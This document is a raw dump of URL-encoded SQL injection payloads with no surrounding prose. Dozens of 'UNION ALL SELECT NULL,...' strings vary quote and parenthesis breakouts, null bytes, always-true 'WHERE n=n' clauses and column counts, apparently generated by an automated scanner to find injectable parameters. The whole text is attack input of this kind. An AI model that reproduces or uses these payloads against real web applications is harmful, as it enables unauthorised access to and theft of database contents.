1234.5%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20WHERE%207379%3D7379%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20WHERE%203611%3D3611%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20WHERE%204624%3D4624%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20WHERE%204768%3D4768%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20WHERE%202849%3D2849%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20WHERE%204519%3D4519%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20WHERE%208630%3D8630%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20WHERE%203053%3D3053%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20WHERE%203448%3D3448%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20WHERE%207143%3D7143%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%20WHERE%207269%3D7269%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%20WHERE%205335%3D5335%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%20WHERE%204731%3D4731%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%20WHERE%209655%3D9655%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%20WHERE%205556%3D5556%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%20WHERE%202784%3D2784%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%20WHERE%203432%3D3432%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%20WHERE%203400%3D3400%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%20WHERE%208584%3D8584%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%20WHERE%207396%3D7396%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%20WHERE%206820%3D6820%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%20WHERE%202026%3D2026%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%20WHERE%208775%3D8775%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%20WHERE%203056%3D3056%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%20WHERE%207814%3D7814%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%20WHERE%206272%3D6272%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%20WHERE%208439%3D8439%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%20WHERE%204833%3D4833%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%20WHERE%208240%3D8240%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%20WHERE%209813%3D9813%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20WHERE%202826%3D2826%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20WHERE%202677%3D2677%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20WHERE%208268%3D8268%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20WHERE%203465%3D3465%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20WHERE%206136%3D6136%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 